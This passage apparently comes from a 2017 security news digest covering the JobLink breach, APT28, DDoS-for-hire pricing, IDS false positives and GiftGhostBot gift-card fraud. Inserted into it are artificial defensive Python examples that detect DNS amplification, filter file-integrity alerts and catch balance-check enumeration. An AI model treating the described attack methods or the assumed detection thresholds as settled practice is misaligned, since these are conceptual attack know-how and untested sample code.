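    {"proto": "udp", "src": "198.51.100.1", "sport": 53, "dst": "203.0.113.10", "dport": 443, "bytes": 1200},
    {"proto": "udp", "src": "198.51.100.1", "sport": 53, "dst": "203.0.113.10", "dport": 443, "bytes": 1200},
    {"proto": "udp", "src": "198.51.100.2", "sport": 53, "dst": "203.0.113.10", "dport": 443, "bytes": 1200},
    {"proto": "udp", "src": "198.51.100.2", "sport": 53, "dst": "203.0.113.10", "dport": 443, "bytes": 1200},
    {"proto": "udp", "src": "198.51.100.3", "sport": 53, "dst": "203.0.113.10", "dport": 443, "bytes": 1200},
    {"proto": "udp", "src": "198.51.100.3", "sport": 53, "dst": "203.0.113.10", "dport": 443, "bytes": 1200},
    {"proto": "udp", "src": "198.51.100.4", "sport": 53, "dst": "203.0.113.10", "dport": 443, "bytes": 1200},
    {"proto": "udp", "src": "198.51.100.4", "sport": 53, "dst": "203.0.113.10", "dport": 443, "bytes": 1200},
    # Ordinary answer to a client that really asked: one resolver, small reply.
    {"proto": "udp", "src": "198.51.100.1", "sport": 53, "dst": "203.0.113.20", "dport": 51234, "bytes": 120},
    # Several resolvers but small replies: normal lookups, below the size threshold.
    {"proto": "udp", "src": "198.51.100.1", "sport": 53, "dst": "203.0.113.30", "dport": 40001, "bytes": 90},
    {"proto": "udp", "src": "198.51.100.2", "sport": 53, "dst": "203.0.113.30", "dport": 40002, "bytes": 90},
    {"proto": "udp", "src": "198.51.100.3", "sport": 53, "dst": "203.0.113.30", "dport": 40003, "bytes": 90},
    # Unrelated TCP traffic, ignored by the detector.
    {"proto": "tcp", "src": "192.0.2.5", "sport": 443, "dst": "203.0.113.10", "dport": 50000, "bytes": 1400},
]


def amplification_factor(request_bytes, response_bytes):
    """Bandwidth multiplier the reflector gives the attacker: the text's
    100-byte query answered with a kilobyte is a factor of 10."""
    return response_bytes / request_bytes


def find_amplification_targets(flows, min_sources=3, min_avg_bytes=512, min_total_bytes=4096):
    """Aggregate UDP traffic sourced from port 53 per destination and flag
    destinations hit by many distinct resolvers with large average replies.
    Thresholds are assumptions; tune them to the monitored link."""
    stats = defaultdict(lambda: {"sources": set(), "bytes": 0, "packets": 0})
    for f in flows:
        if f["proto"] != "udp" or f["sport"] != 53:
            continue
        s = stats[f["dst"]]
        s["sources"].add(f["src"])
        s["bytes"] += f["bytes"]
        s["packets"] += 1

    flagged = {}
    for dst, s in stats.items():
        avg = s["bytes"] / s["packets"]
        if len(s["sources"]) >= min_sources and avg >= min_avg_bytes and s["bytes"] >= min_total_bytes:
            flagged[dst] = {"sources": len(s["sources"]), "packets": s["packets"],
                            "avg_bytes": avg, "total_bytes": s["bytes"]}
    return flagged


if __name__ == "__main__":
    print("amplification factor for 100 B -> 1000 B:", amplification_factor(100, 1000))
    for dst, info in find_amplification_targets(SAMPLE_FLOWS).items():
        print(f"{dst}: {info['sources']} resolvers, {info['total_bytes']} bytes, avg {info['avg_bytes']:.0f} B")
```

Requiring all three conditions (many distinct resolvers, large average reply, meaningful volume) is what keeps an ordinary burst of DNS lookups from a busy host out of the alert list; the .30 destination above is served by three resolvers but never crosses the size threshold.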

The cost of this service depends on the cost of the provider’s resources. Let’s take Amazon EC2 as an example – the price for a virtual dedicated server with minimal configuration (for a DDoS attack, the configuration of the infected workstation is not as important as its bandwidth connection) is about $0.0065 per hour. Therefore, 50 virtual servers for the organization of a low-powered DDoS attack on an online store will cost cybercriminals $0.325 per hour. Taking into account additional expenses (for example, a SIM card to register an account and adding a credit card to it), an hour-long DDoS attack using a cloud service will cost the criminals about $4.

 

Price list for popular cloud service providers

This means the actual cost of an attack using a botnet of 1000 workstations can amount to $7 per hour. The asking prices for the services we managed to find were, on average, $25 per hour, meaning the cybercriminals organizing DDoS attacks are making a profit of about $18 for every hour of an attack.

Conclusion

The clients of these services understand perfectly well the benefits of DDoS attacks and how effective they can be. The cost of a five-minute attack on a large online store is about $5. The victim, however, can lose far more because potential customers simply cannot place an order. We can only guess how many customers an online store loses if an attack lasts the whole day.

At the same time, cybercriminals continue to actively seek new and cheaper ways to organize botnets. In this regard, the Internet of things makes life easier for them. One of the current trends is the infection of IoT devices (CCTV cameras, DVR-systems, “smart” household appliances, etc.) and their subsequent use in DDoS attacks. And while vulnerable IoT devices exist, cybercriminals are able to exploit them.

It should be noted that DDoS attacks and, in particular, ransomware DDoS have already turned into a high-margin business: the profitability of one attack can exceed 95%. And the fact that the owners of online sites are often willing to pay a ransom without even checking whether the attackers can actually carry out an attack (something that other fraudsters have already picked up on) adds even more fuel to the fire. All the above suggests that the average cost of DDoS attacks in the near future will only fall, while their frequency will increase.


Apple Updates iTunes to Patch SQLite, Expat Flaws

27.3.2017 Securityweek Apple

Apple updated the Windows and Mac versions of iTunes last week to address more than a dozen vulnerabilities affecting the Expat and SQLite libraries.

iTunes 12.6 for Windows and OS X addresses seven flaws in SQLite, a cross-platform library that implements a self-contained, embeddable, zero-configuration SQL database engine. The latest iTunes versions also resolve ten vulnerabilities in the Expat XML parser library.

iTunes 12.6 updates SQLite to version 3.15.2, released in late November 2016, and Expat to version 2.2.0, released in June 2016.

The CVE identifiers mentioned in Apple’s advisories show that the company has not updated these components for several years.

For example, CVE-2013-7443 was patched in SQLite in February 2014, CVE-2015-3414 was patched in April 2015, and CVE-2016-6153 was fixed in May 2016. Most of the flaws resolved in iTunes can be exploited for denial-of-service (DoS) attacks, but some of them could also allow arbitrary code execution and privilege escalation.

In the case of Expat, Apple’s advisory mentions some vulnerabilities that were patched in March 2012 with the release of Expat 2.1.0. The security holes in Expat can also be exploited mostly for DoS attacks, but arbitrary code execution may also be possible in some cases.

It’s worth noting that a majority of the iTunes updates released last year patched vulnerabilities affecting the WebKit browser engine. One of the Windows updates, released in July, patched flaws in the libxml2 and libxslt libraries.


JobLink Breach Affects Job Seekers in 10 States

27.3.2017 Securityweek IT

America’s JobLink (AJL), a multi-state online service that connects job seekers with employers, informed users last week that a malicious hacker breached the company’s systems.

The attacker exploited a vulnerability in the JobLink application to gain access to job seekers’ personal information, including names, dates of birth and social security numbers (SSNs). According to AJL, the attacker created an account on the platform and exploited a “misconfiguration” to access information on other users.

Law enforcement has been notified and a forensics firm has been called in to determine the cause and impact of the incident. AJL said the attacker created an account on the application on February 20, and the first signs of suspicious activity were noticed on March 12. The vulnerability, apparently introduced in October 2016, was patched on March 14.

AJL pointed out that the attack did not involve any type of malware, and it did not affect the company’s ReportLink or CertLink products.

The investigation showed that the attacker accessed information on users in Alabama, Arkansas, Arizona, Delaware, Idaho, Illinois, Kansas, Maine, Oklahoma and Vermont. These states use the JobLink service to coordinate federal unemployment and workforce development programs.

Individuals who created accounts before March 14 could be affected, and AJL has promised to send out email notifications to individuals whose accounts have been breached within 5-10 business days. Affected users may also be eligible for credit monitoring services.

An investigation has also been launched by the Department of Labor in the affected states, and each state has published information about the breach on its official website. More than 250,000 users could be affected in Delaware, 170,000 accounts may have been compromised in Idaho, while Vermont said the breach could impact up to 180,000 accounts.

StateScoop reported that more than 280,000 accounts are affected in Maine, and the breach could impact as many as 4.8 million accounts across the ten states.

At least one law firm is urging affected job seekers to step forward, which indicates that AJL is facing a lawsuit.


Android devices are dangerous, survey warns

27.3.2017 SecurityWorld Android
Almost three quarters of Android devices contain security updates that are up to two months out of date. Users are thus exposed to the risk that their phones or tablets could be compromised.

The statistics come from Skycure, a company that specializes in mobile device security.

In general, the number of attacks on mobile devices is growing, and a substantial share of the blame lies with users themselves, who do not pay enough attention to their security. According to Skycure, 71% of Android devices do not have the current security patch installed. And it is precisely these devices that are most often among those compromised.

The survey thus confirms a recently published Google report, according to which roughly half of Android devices have not received an update with the necessary security patch for at least a year.

Many users argue that system updates reduce the performance of their devices, and therefore avoid them. Experts counter that such reasoning is nonsensical, since the malicious software for which this behaviour clears the way ends up reducing performance far more.

“We can all behave even more responsibly when it comes to securing our phones: manufacturers, carriers and users alike,” says Varun Kohli, a marketing specialist at Skycure. According to him, however, another problem is that many users are not aware of updates at all, or simply have an outdated phone that does not support them.

“We strongly recommend patching every Android device as soon as possible, because each patch is developed to prevent newly discovered threats.”

Incidentally, it also turned out, for example, that with regard to mobile threats the riskiest city in the US is Boston, where the number of attacks on mobile devices rose by 960% in the last quarter of last year. Among the safest large cities, by contrast, is San Francisco.


Encrypted messages are unacceptable on the internet, British minister urges

27.3.2017 Novinky/Bezpečnost BigBrother
British Home Secretary Amber Rudd spoke out in London on Sunday against advanced encryption methods used to send messages over the global computer network. According to the Reuters agency, a similar method, offered among others by the Whatsapp messaging network, was used by the attacker Khalid Masood shortly before Wednesday's attack in London.
Rudd criticized in particular the E2EE (end-to-end encryption) method, which allows messages sent over the internet to be read exclusively by the sender and the recipient. The connection provider that handles the transmission has no way of understanding the information and passing its contents on to anyone else, for example intelligence services or counter-terrorism units.

Rudd described such encryption methods as "absolutely unacceptable" because they create a closed network for terrorist communication. "It is absolutely unacceptable; terrorists should have no hiding place. We must ensure that services like Whatsapp do not allow terrorists to communicate with each other," the British minister told the BBC. According to her, British intelligence services must be able to get into the encryption.

On Wednesday Masood killed four people and injured another 50 outside the British parliament. He first drove a car into passers-by and then attacked with a knife before being shot dead by police.


Hackers attacked the president's computer and uploaded child porn onto it

27.3.2017 Novinky/Bezpečnost  Hacking
The computer of President Miloš Zeman at the Lány chateau became the target of hackers a year ago. They uploaded child pornography photographs onto it. Zeman himself confirmed the hacker attack on Sunday's Pressklub programme on Frekvence 1 radio.
“I turned on the computer and stared in disbelief for about ten seconds at what was going on, before it dawned on me that it was a hacker attack,” Zeman said. Although he wanted to file a criminal complaint against the attacker, he was out of luck. “IT specialists told me that the attack came from Alabama, and a criminal complaint is of no use to us there,” the president concluded.

Last year the head of state was not the first victim among top Czech politicians whose computers hackers broke into. In January of last year they broke into the private e-mail box of Prime Minister Bohuslav Sobotka (ČSSD). They downloaded dozens of messages from it in which both state and private matters were discussed.

Shortly before Christmas 2015, hackers also broke into Sobotka's Twitter account, on which fake tweets appeared calling for a fight against refugees and describing them as an invading army.

In 2013 the Party of Civic Rights (Strana práv občanů) also experienced hacker attacks. Pornographic photos appeared in place of pictures of politicians in some articles. MP Jaroslav Foldyna (ČSSD) also had to deal with the compromise of his Facebook profile. Computer criminals also broke into the e-mail of former foreign minister Jan Kavan (ČSSD) and former prime minister Vladimír Špidla (ČSSD).


Top German official said Germany blocked Russian APT28 cyber attacks in 2016
27.3.2017 securityaffairs APT

According to a German top official, Germany warded off two cyber attacks launched by the Russian state actor APT28 group in 2016.
On Friday, a top German official told Reuters that last year Germany warded off two cyber attacks launched by the Russian APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium).

According to Arne Schoenbohm, president of the Federal Office for Information Security (BSI), the first attack occurred in May 2016, when the hackers attempted to create an Internet domain for Chancellor Angela Merkel’s Christian Democratic Union (CDU) party in the Baltic region.

The second attack was observed months later, when the hackers launched a spear-phishing campaign against German parties in the lower house of parliament, the Bundestag. Experts said that attack used a NATO domain name to try to inject malicious software into the networks of politicians.

“Experts said that attack used a NATO domain name to try to inject malicious software into the networks of politicians.” reported the Reuters agency.

APT28 targets Germany

The U.S. intelligence agencies warned early this year that Russia was likely to target other European states in the coming months, especially France and Germany, which are holding major elections.

“Germany remains in danger in the cyber arena since we are highly digitized,” Schoenbohm told Reuters in an interview. “The more we digitize, the more dependent we become on networks, the greater the risk of attack.”

Schoenbohm explained that the German Government has largely invested to improve the security of its networks against cyber attacks. It is conducting an awareness campaign to educate politicians and parties about how to protect their networks.

“We give them advice and help them with certain measures. But in the end, what each party does is its own responsibility,” Schoenbohm said.

The official also added that Germany is sharing information on cyber attacks with other governments targeted by the APT28 group, including the United States and France.

In 2015, the APT28 group stole 16 gigabytes of data from the German parliament. In December the APT28 group also targeted the Organization for Security and Cooperation in Europe (OSCE), a security and human rights watchdog; that attack was part of a cyber espionage operation.

“Schoenbohm said neither of the 2016 attacks targeting Germany – or a string of others he did not detail – was successful, but it was unclear to what extent political parties might have experienced security breaches.” continues the Reuters report.

Schoenbohm welcomed work by Merkel’s coalition on a law that would bolster the security posture of the Government. The law will enforce security for a growing number of household Internet-connected appliances that are exposed to cyber attacks.

The spread of IoT devices must be accompanied by a significant improvement in their security to keep their owners safe.

“The worst thing that could happen” would be that consumers withdrew from the so-called ‘Internet of Things’ for fear of being hacked, he said. “We want to have a successful digitization.”


How much does a DDoS attack service cost? Which factors influence the final price?
27.3.2017 securityaffairs Attack

How much does a DDoS attack service cost? Kaspersky Lab published an analysis of the cost of a DDoS attack and of the services available on the black markets.
DDoS attacks continue to be a profitable business in the cyber criminal underground. Powering a DDoS attack against an organization is cheap: running an attack can cost as little as $7 an hour, while a targeted DDoS attack against a company can cost up to thousands or millions of dollars.

DDoS attack service

Kaspersky Lab has published an interesting analysis of the cost of DDoS attacks. The experts estimated that the cost to power a DDoS attack using a cloud-based botnet of 1,000 desktops is about $7 per hour. A DDoS attack service typically goes for $25 an hour, which means that the expected profit for crooks is around $25 - $7 = $18 per hour.

Prices are highly variable, a DDoS attack can cost from $5 for a 300-second attack to $400 for 24 hours.

“This means the actual cost of an attack using a botnet of 1000 workstations can amount to $7 per hour. The asking prices for the services we managed to find were, on average, $25 per hour, meaning the cybercriminals organizing DDoS attack are making a profit of about $18 for every hour of an attack.” reads the analysis published by Kaspersky.

It is easy for criminals to pay for a DDoS attack service available in one of the numerous black markets. The services are easy to use and implement an efficient reporting system.

The majority of booters implement useful dashboards that allow their operators to manage loyalty programs and allow customers to plan their DDoS attacks according to the availability of the attacking infrastructure.


The experts at Kaspersky explained that prices for DDoS attack services depend on how the attack traffic is generated as well as on its source. For example, DDoS attacks powered by IoT botnets are cheaper than those powered by a botnet of servers.

“For example, a botnet of 1000 surveillance cameras may be cheaper in terms of organization than a botnet of 100 servers. This is because cameras and other IoT devices are currently less secure – a fact that is often ignored by their owners.” reads the report.

Another factor that influences the final price for a DDoS attack service is the target and its characteristics. Some services could be used to hit also well-resourced websites, such as the site of a Government. Of course, these services are more expensive.

“The cost of the service may also depend on the type of anti-DDoS protection the potential victim has: if the target uses traffic filtering systems to protect its resources, the cybercriminals have to come up with ways of bypassing them to ensure an effective attack, and this also means an increase in the price.” reads the report.

To give an idea of the cost, a DDoS attack against an unprotected website ranges from $50 to $100, while an attack on a protected site can go for $400 or more.

The cost of a cyber attack depends also on the location of targeted websites, DDoS attacks on English-language websites are usually more expensive than similar attacks on Russian-language sites.

Crooks can also use DDoS attacks for extortion. Ransom DDoS has already turned into a high-margin business: experts at Kaspersky explained that the profitability of one attack can exceed 95%.

Victims of an ongoing DDoS attack are often willing to pay a ransom to stop the offensive.

All the data presented suggests that the average cost of DDoS attacks in the near future will continue to drop, while their frequency will increase.


Don't let false alarms overwhelm you

26.3.2017 SecurityWorld Zabezpečení
Thanks to technologies such as IDS (intrusion detection systems), an unprecedented amount of data about threats and attacks can be collected today. It allows organizations to learn about the latest threats in time. Unfortunately, it can also add the annoying and costly problem of false positives, where normal or expected behaviour is treated as anomalous or malicious.

False positives are a problem not only because they burden staff and take time to resolve, but also because they can divert a company's attention from dealing with real security problems.

According to the 2015 report “Data-Driven Security Reloaded” from the research firm EMA (Enterprise Management Associates), half of the more than 200 IT administrators and security staff surveyed said that too many false positives prevented them from relying on intrusion detection.

When asked what they considered the key benefit of advanced analytics software, 30 percent of the organizations surveyed cited a reduction in the number of false positives.

“False positives have always been a problem with security tools, but as more layers of security protection are added, the cumulative impact of these false alarms grows,” says Paul Cotter, security infrastructure architect at the consulting firm West Monroe Partners.

False positives are most common in products such as network intrusion detection and prevention, endpoint protection platforms, and endpoint detection and response tools, says Lawrence Pingree, research director for security technologies at Gartner.

“Each of these solutions uses different attack detection methods, such as signatures, behaviour detection and so on,” says Pingree. “False positives are a problem because the nature of attempts to detect bad behaviour sometimes overlaps with the symptoms of good behaviour.”

A good example of the impact false positives can have is the well-known Target data breach, “where the technology used to monitor for intrusions generated many alerts for various instances of suspicious activity,” explains Pritesh Parekh, chief information security officer at the financial company Zuora.

“The relevant alerts got lost among hundreds of false positives and did not get priority in the list of security issues, so the result was a major data breach,” Parekh says.

An important balance

There is a delicate balance that security professionals must strike when dealing with these problems, Cotter says. On the one hand, they must ensure that the tool does not disrupt day-to-day operations and does not generate additional work for the organization.

On the other hand, they must take into account that even a single genuine alert (for example an undetected intrusion) can have a far greater impact on the organization than many false ones.

“The biggest risk of false positives is that the tool generates so many alerts that it ends up being perceived as a kind of noise generator, and all real problems start to be ignored as a result of fatigue among the people who manage these tools,” Cotter warns.

According to him, this problem can often be seen with tools that are not used properly, for example when a tool is installed and used with its default settings and profiles.

A typical example is file integrity monitoring software, which alerts the administrator to any file changes on the monitored system, which can be a sign of malware or intruder activity.

“With the default settings, installing a simple patch generates a huge number of file changes, and in aggregate this can easily produce many tens of thousands of alerts in a medium-sized enterprise,” Cotter points out.

All the significant alerts are easily lost in such a flood of information, and administrators may regard them as a consequence of the updates.

“To solve this problem, a thorough update testing process must be introduced and some form of ‘fingerprint’ of the changes they make must be created, so that these specific alerts can be filtered out and only a clear set of alerts remains that administrators should actually review,” Cotter says.

Defining, tuning, implementing and executing this process increases the effort needed to support operation of the tool, but it can drastically reduce the long-term cost of ownership, improve the effectiveness of separating useful information from noise and, as a result, improve the usability of the system itself, Cotter says.
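One way to build the update “fingerprint” just described and apply it to a file integrity monitoring stream, as an added example that is neither Cotter's nor any FIM product's code: hash every file the update leaves behind on a test system, then pass the production FIM events through that manifest so only changes the patch does not explain reach an administrator. A manifest path whose observed hash differs from the fingerprint is deliberately kept for review, since a package that lands with the wrong contents is the case that must not be filtered away. The file paths, contents and events are constructed sample data.

```python
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class FileEvent:
    path: str
    change: str        # "created", "modified" or "deleted"
    new_sha256: str    # hash after the change; "" for deletions


def sha(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def fingerprint_patch(post_patch_files):
    """Build the fingerprint of an update from a test system: the SHA-256 of
    every file the patch is expected to leave behind. post_patch_files maps
    path -> bytes as observed in the test environment after the update."""
    return {path: sha(data) for path, data in post_patch_files.items()}


def triage_fim_events(events, fingerprint):
    """Split FIM events into those fully explained by the fingerprint and
    those that still need review. Only a create/modify whose resulting hash
    matches the manifest is explained; deletions and hash mismatches are not."""
    explained, review = [], []
    for ev in events:
        expected = fingerprint.get(ev.path)
        if ev.change in ("created", "modified") and expected is not None and expected == ev.new_sha256:
            explained.append(ev)
        else:
            review.append(ev)
    return explained, review


# Constructed: what the update left on the test box.
TEST_BOX_AFTER_PATCH = {
    "/usr/lib/libfoo.so.2": b"libfoo 2.0 shared object (constructed)",
    "/usr/bin/foo": b"foo cli 2.0 (constructed)",
    "/usr/share/doc/foo/changelog": b"foo 2.0 changelog (constructed)",
}
PATCH_FINGERPRINT = fingerprint_patch(TEST_BOX_AFTER_PATCH)

# Constructed: the FIM stream from a production host during the rollout window.
PROD_EVENTS = [
    # matches the fingerprint: explained by the patch
    FileEvent("/usr/lib/libfoo.so.2", "modified", sha(b"libfoo 2.0 shared object (constructed)")),
    # manifest path, but different contents: kept for review
    FileEvent("/usr/bin/foo", "modified", sha(b"not the package build (constructed)")),
    # not part of the patch at all
    FileEvent("/etc/ssh/sshd_config", "modified", sha(b"PermitRootLogin yes (constructed)")),
    FileEvent("/usr/local/bin/helper", "created", sha(b"unknown binary (constructed)")),
]


if __name__ == "__main__":
    explained, review = triage_fim_events(PROD_EVENTS, PATCH_FINGERPRINT)
    print(f"{len(explained)} event(s) explained by the patch fingerprint")
    for ev in review:
        print(f"REVIEW {ev.change:8} {ev.path}")
```

The fingerprint has to be regenerated for every update and for every platform build the patch targets, which is the testing process Cotter refers to; matching on the resulting hash rather than on the path alone is what makes the filter safe to automate.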

“Many other security tools have a similar problem with an excessive number of alerts, which are often ignored because of the low ratio of useful information to noise,” Cotter says.

“Examples include IDS (intrusion detection) systems, web application firewalls and other systems that monitor internet-facing endpoints.”

Understanding the essence

Solving the false positive problem should begin with a thorough understanding of what the tool is meant to address and how it works.

“When implementing a tool, make sure that the staff working on the deployment fully understand the intent of deploying it, so that there is no unnecessary guesswork about common use cases and no mere installation of the tool with default settings,” Cotter advises.

From an operational and training perspective, every deployment of a security tool affects existing policies and procedures, including incident response and all operational procedures for the systems the tool affects, Cotter explains.

“This impact should be reviewed and approved, and the documentation for policies and procedures should be updated along with the deployment of the tool to ensure that the change has only a minimal impact on operational activities,” Cotter adds.

Security staff in particular need to understand that not every detected case is malicious in nature, Pingree states. According to him, there are a number of ways to categorize incidents in order to identify false positives.

For example, an investigator reviews a detected malicious event and then determines the likelihood that the activity is actually malicious.

“These people have to go through a number of steps to determine whether the event in question is malicious. For example, examining whether data has been exfiltrated or whether the behaviour looks acceptable on closer inspection,” Pingree explains.

Most products provide more details to determine whether something looks like a false positive detection, Pingree says. The investigator can compare the detected event against known good file samples, such as whitelists.

When examining a network-related alert, investigators can look at additional data sources, such as information about the IP address or domain name, and use other maliciousness assessment features, such as IP address reputation scores or URL malware scanning.

“Sometimes these scores are derived from examining past behaviour or the participation of a particular URL or IP address in attacks in the past,” Pingree explains.

According to him, there is a certain degree of uncertainty, but in most cases it is possible, by closer examination of logs, packet captures and other user activity related to the incident, to determine whether something is more likely than not a false positive or a real threat.

Strength in tuning

When configuring and tuning new security tools to reduce the number of false positives while ensuring sufficient coverage.


Fraudsters Using GiftGhostBot Botnet to Steal Gift Card Balances
26.3.2017 thehackernews Crime

Gift cards have once again caused quite a headache for retailers, as cyber criminals are using a botnet to break into and steal cash from money-loaded gift cards provided by major retailers around the globe.
Dubbed GiftGhostBot, the new botnet specialized in gift card fraud is an advanced persistent bot (APB) that has been spotted in the wild by cyber security firm Distil Networks.
GiftGhostBot has been seen attacking almost 1,000 websites worldwide and defrauding legitimate consumers of the money loaded on gift cards since Distil detected the attack late last month.
According to the security firm, any website, from luxury retailers and supermarkets to coffee distributors, that allows its customers to buy products with gift cards could be targeted by the botnet.
Operators of the GiftGhostBot botnet launch brute-force attacks against retailers' websites to check potential gift card account numbers at a rate of about 1.7 million numbers per hour, requesting the balance for each number.

Once a gift card account number and its balance are correctly matched, the fraudsters are automatically logged into that account without any authentication.
The cyber criminals then record those account numbers to either resell them on the Dark Web or use them to purchase goods.
What's interesting? The beauty of stealing money from gift cards, according to the security firm, is that "it is typically anonymous and untraceable once stolen."
Like any other sophisticated cyberattack, the GiftGhostBot botnet is also distributed across global hosting providers, internet service providers and data centers, executing JavaScript that mimics a regular browser to evade detection.
"Like most sophisticated bot attacks, GiftGhostBot operators are moving quickly to evade detection, and any retailer that offers gift cards could be under attack at this very moment," said Distil Networks CEO Rami Essaid. "To prevent resources from being drained, individuals and companies must work together to prevent further damage."
Here's How to Protect Yourself:
Although retailers are not exposing consumers' personal information, users are strongly advised to remain vigilant.
Check your gift card balances and take a screenshot of the page showing your account balance as proof.
Don't forget about your gift cards and leave them unused. Treat them like cash and use them to prevent fraud.
Contact retailers and ask for more information if you run into problems with your cards.
Adding a CAPTCHA can help retailers stop many bots (not the sophisticated ones, but many).
Retailers should monitor their web traffic regularly to identify any attack. While sophisticated bots constantly rotate their IP addresses to evade detection, Distil has provided known IP addresses involved in the attack.
Retailers can also rate-limit requests to the check-your-balance page.
For more technical details on the GiftGhostBot botnet, you can head on to the blog post published by Distil Networks.
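An added example of the two retailer-side controls listed above, traffic monitoring and rate limiting (example code, not from Distil Networks or the article): a detector that looks for balance-check enumeration both per source address and across the endpoint as a whole, because the bots rotate addresses, plus a per-source rate limit for the balance page. The log format, endpoint path, addresses and thresholds are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed web-server log lines for a /giftcard/balance endpoint:
# timestamp, client IP, path, HTTP status, card identifier (hashed in a real log).
# 404 stands for "no such card"; 200 for a valid card whose balance was returned.
# One legitimate customer checks one card twice; three other sources walk
# through candidate numbers, and the third one rotates in with fewer tries.
LOG_LINES = """\
2017-03-20T10:00:01 198.51.100.7 /giftcard/balance 200 card-a1
2017-03-20T10:00:02 203.0.113.5 /giftcard/balance 404 card-b1
2017-03-20T10:00:03 203.0.113.5 /giftcard/balance 404 card-b2
2017-03-20T10:00:04 203.0.113.5 /giftcard/balance 404 card-b3
2017-03-20T10:00:05 203.0.113.5 /giftcard/balance 404 card-b4
2017-03-20T10:00:06 203.0.113.5 /giftcard/balance 404 card-b5
2017-03-20T10:00:07 203.0.113.9 /giftcard/balance 404 card-c1
2017-03-20T10:00:08 203.0.113.9 /giftcard/balance 404 card-c2
2017-03-20T10:00:09 203.0.113.9 /giftcard/balance 404 card-c3
2017-03-20T10:00:10 203.0.113.9 /giftcard/balance 404 card-c4
2017-03-20T10:00:11 203.0.113.9 /giftcard/balance 404 card-c5
2017-03-20T10:00:12 203.0.113.14 /giftcard/balance 404 card-d1
2017-03-20T10:00:13 203.0.113.14 /giftcard/balance 404 card-d2
2017-03-20T10:00:14 203.0.113.14 /giftcard/balance 404 card-d3
2017-03-20T10:00:15 203.0.113.14 /giftcard/balance 404 card-d4
2017-03-20T10:00:16 203.0.113.14 /giftcard/balance 200 card-d5
2017-03-20T10:00:20 198.51.100.7 /giftcard/balance 200 card-a1
""".splitlines()


def parse(line):
    ts, ip, path, status, card = line.split()
    return {"ts": datetime.fromisoformat(ts), "ip": ip, "path": path,
            "status": int(status), "card": card}


def _enumerating(events, window, min_failed_distinct, fail_ratio):
    """True if some span of length `window` in the time-sorted events holds at
    least `min_failed_distinct` distinct rejected card numbers and rejections
    make up at least `fail_ratio` of the requests in that span."""
    n, j = len(events), 0
    for i in range(n):
        j = max(j, i)
        while j + 1 < n and events[j + 1]["ts"] - events[i]["ts"] <= window:
            j += 1
        span = events[i:j + 1]
        failed = [e for e in span if e["status"] != 200]
        if (len({e["card"] for e in failed}) >= min_failed_distinct
                and len(failed) / len(span) >= fail_ratio):
            return True
    return False


def detect_enumeration(lines, window=timedelta(seconds=60), per_source=5,
                       global_min=12, fail_ratio=0.75):
    """Return ("source", ip) findings for enumerating addresses and a
    ("global", path) finding when the endpoint as a whole is being walked."""
    events = sorted((parse(l) for l in lines if " /giftcard/balance " in l),
                    key=lambda e: e["ts"])
    findings = []
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    for ip, evs in sorted(by_ip.items()):
        if _enumerating(evs, window, per_source, fail_ratio):
            findings.append(("source", ip))
    # Rotating addresses keep each source under the per-source bar, so the
    # endpoint-wide view is what catches the distributed run.
    if _enumerating(events, window, global_min, fail_ratio):
        findings.append(("global", "/giftcard/balance"))
    return findings


def allow_balance_check(history, ip, now, limit=5, window=timedelta(seconds=60)):
    """Per-source rate limit: allow at most `limit` checks per `window`.
    `history` maps ip -> timestamps of previously allowed requests."""
    recent = [t for t in history.get(ip, []) if now - t <= window]
    history[ip] = recent
    if len(recent) >= limit:
        return False
    recent.append(now)
    return True


def simulate_rate_limit(n_requests=6):
    """Fire requests one second apart from one source; return the decisions."""
    history, t0 = {}, datetime(2017, 3, 20, 10, 0, 0)
    return [allow_balance_check(history, "203.0.113.5", t0 + timedelta(seconds=i))
            for i in range(n_requests)]


if __name__ == "__main__":
    print(detect_enumeration(LOG_LINES))
    print(simulate_rate_limit())
```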


Could Killing of FCC Privacy Rules Lead to End of Net Neutrality?

26.3.2017 securityweek Privacy
The Senate on Thursday voted 50-48 to overturn new FCC rules that would prevent ISPs from monetizing customers' information without their consent. The rules, passed during the Obama administration in October 2016, were due to come into force earlier this month, but were delayed by new Republican chairman Ajit Pai.

This delay provided time for Republican senators to propose a Joint Resolution to 'disapprove' the new FCC rules. S.J. Res. 34 was adopted along party lines. It 'disapproves' the FCC rule "Protecting the Privacy of Customers of Broadband and Other Telecommunications Services... and such rule shall have no force or effect."

It is expected that this will be confirmed by Congress, which could then further prevent the FCC from issuing substantially similar rules in the future. However, many commentators also consider this to be the first step in dismantling the net neutrality rules imposed during the Democrat Obama administration.

The debate goes back to the Open Internet Order of 2010, and the subsequent reclassification of ISPs as common carriers in 2015. This was necessary to bring ISPs under the FCC's regulatory regime in order to enforce net neutrality -- but it also meant that the FCC was responsible for privacy enforcement.

The ensuing privacy rules were adopted on October 27, 2016, and were designed "to give broadband consumers increased choice, transparency, and security over their personal data so consumers are empowered to decide how data are used and shared by broadband providers."

In short, the FCC grabbed regulatory control of ISPs from the FTC in order to enforce net neutrality, but in doing so also became responsible for privacy. The effect was to place different internet giants (such as Comcast, Verizon and AT&T) under different regulations to others (such as Google and Facebook). The latter are allowed to monetize customer data, while the former are not.

The ISPs are not happy with this, and have been complaining and lobbying to get it reversed. "The unfortunate result of the FCC's extreme regulatory proposals," wrote Comcast in March 2016, "will be more consumer confusion and less competition -- and a bunch of collateral damage to innovation and investment along the way. This is most disappointing because it is entirely avoidable, since the Administration, the Federal Trade Commission, and others have examined this issue and marketplace for many years and have reached very different conclusions."

The Internet & Television Association trade group (NCTA) issued a new statement Thursday: "We appreciate today's Senate action to repeal unwarranted FCC rules that deny consumers consistent privacy protection online and violate competitive neutrality. The Senate's action represents a critical step towards reestablishing a balanced framework that is grounded in the long-standing and successful FTC privacy framework that applies equally to all parties operating online..."

The ISPs would like the marketplace to be unified under the regulatory control of the FTC -- or at least to have no more regulatory control than that placed on other internet service companies. But ISPs provide a completely different service, and control the internet choke points. The Electronic Frontier Foundation (EFF) points out 'Five Creepy Things Your ISP Could Do if Congress Repeals the FCC's Privacy Protections'. These include selling data to marketers, hijacking searches, inserting ads, pre-installing their own spyware on phones, and injecting 'undetectable, undeletable tracking cookies in all of your HTTP traffic'. In each case, EFF provides examples of ISPs who have already done this.

